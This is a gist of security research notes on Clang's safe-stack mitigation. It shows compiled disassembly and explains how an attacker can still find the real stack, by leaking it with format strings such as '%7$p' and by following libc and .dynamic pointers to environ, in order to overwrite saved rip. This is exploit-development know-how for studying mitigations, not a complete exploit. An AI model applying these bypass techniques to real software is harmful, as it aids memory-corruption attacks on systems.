yrp604/safe-stack-notes.md

## safe-stack-notes.md

      
    Raw
  

              safe-stack-notes.md
            
          
    Note: I've only briefly read the related CPI paper (PDF), this is just initial impressions after playing around with it a bit.
All the code and binaries I used can be downloaded here. Note that I removed -DFORTIFY_SOURCE=2 to make the examples a bit simpler.
-fsanitize=safe-stack basically seems to move stack based buffers off the actual stack, onto another segment of memory (I'll call it the fake stack). The actual stack then stores references to this segment. For example:
char buf[20];
printf("%p\n", buf);
Normally gets turned into something like:
lea    rdi,[rip+0x309]        # "%p\n"
lea    rsi,[rbp-0x20]         # buf
call   810 <printf@plt>
Note the lea rsi, loading the address of the stack based buffer into rsi.
However, with safe-stack this code looks something like:
lea    rdi,[rip+0x103e]        # "%p\n"
mov    rsi,QWORD PTR [rbp-0x50]# buf
call   1680 <printf@plt>
Note that now instead of lea we're now dereferencing memory (QWORD PTR...) to get the second argument to printf(3).
In effect, this means that leaking the address of a "stack" based buffer no longer gives us a distance to a saved rip address, because the segment with all our "stack" variables is mapped into memory at a random offset from our actual stack. We can see this happen here (selected instructions from the prolog):
mov    r10,0xffffffffffffffd8
mov    r11,QWORD PTR fs:[r10]
mov    r10,r11
add    r10,0xffffffffffffffe0
mov    QWORD PTR [rbp-0x50],r10
Exploitation

Format Strings

If we're looking at exploiting a binary with safe-stack, we need to leak the address of the actual stack. I'm sure there are a variety of ways to do this, but the first that sprung to mind was to use a format string. On Linux x86_64 the first six arguments are passed via registers, then are spilled onto the stack. This mean's if we pass a format string such as "%p%p%p%p%p%p%p" (or "%7$p" assuming no FORTIFY_SOURCE) we'll start to leak actual stack contents. As an added bonus, because all the buffers have been moved off the actual stack, we'll pretty much immediately hit saved registers. From there, these can be clobbered with a write-what-where vulnerability. Additionally, we don't even have to be too careful, as -fsanitize=safe-stack automatically removes -fstack-protector.
libc.so.6

libc's .data segment has a pointer to the current executable name, which is stored on the stack. Offsets from libc.so.6's base address.
+0x3ec0 <program_invocation_short_name>: stack addr
+0x3ec8 <program_invocation_name>:       stack addr

This means from a leaked libc.so.6 pointer, you can pretty easily compute your saved rip location to hit, presuming you have a read primitive.
.text

The .dynamic segment of the main executable contains a pointer to libc.so.6's .bss segment. The .bss segment contains the environ variable (as well as others), which points to the stack.
+0xbcf0 <_DYNAMIC+136>: .bss addr

In my case, .bss addr - 0x40 will give you the address of the environ pointer, which you can follow to the stack. Thus, from a leaked .text pointer you should be able to recover the stack.
Final thoughts

Obviously all these offsets will change, but the basic idea is there are pointers to the stack all over the place, and if we have read/write primitives and can follow them, we're going to likely be able to recover the location of saved rip and overwrite it. If there are no pointers to the stack in a segment we can leak memory from, there are likely pointers to another segment and we can follow them to recover the relevant details.
Contrary to my initial thoughts, the main benefit of safe-stack doesn't actually appear to be protection of the saved stack registers but instead an informational one. Leaking stack-based memory (via some classes of infoleak) will no longer give an easy path to things like saved registers or things like __libc_start_main. In this way, it helps strengthen ASLR.
alloca(3)

Because I was curious, what does alloca(3) look like?
char *buf;
buf = alloca(strtoul(argv[1], NULL, 0));
printf("%p\n", buf);
call   401010 <strtoul@plt>
mov    rsi,0xffffffffffffffd8
mov    rdi,QWORD PTR fs:[rsi]
sub    rdi,rax
mov    rax,rdi
and    rax,0xfffffffffffffff0
mov    QWORD PTR fs:[rsi],rax
mov    QWORD PTR [rbp-0x18],rdi
mov    rsi,QWORD PTR [rbp-0x18]# buf
mov    rdi,QWORD PTR [rbp-0x20]# "%p\n"
call   401020 <printf@plt>
I haven't gone through this in detail, but we see the pointer being fetched from the fake stack, being subtracted by the return of strtoul(3) and restored. I'm curious how this will work when you have either very large alloca(3) allocations, or adjacent buffers on the fake stack.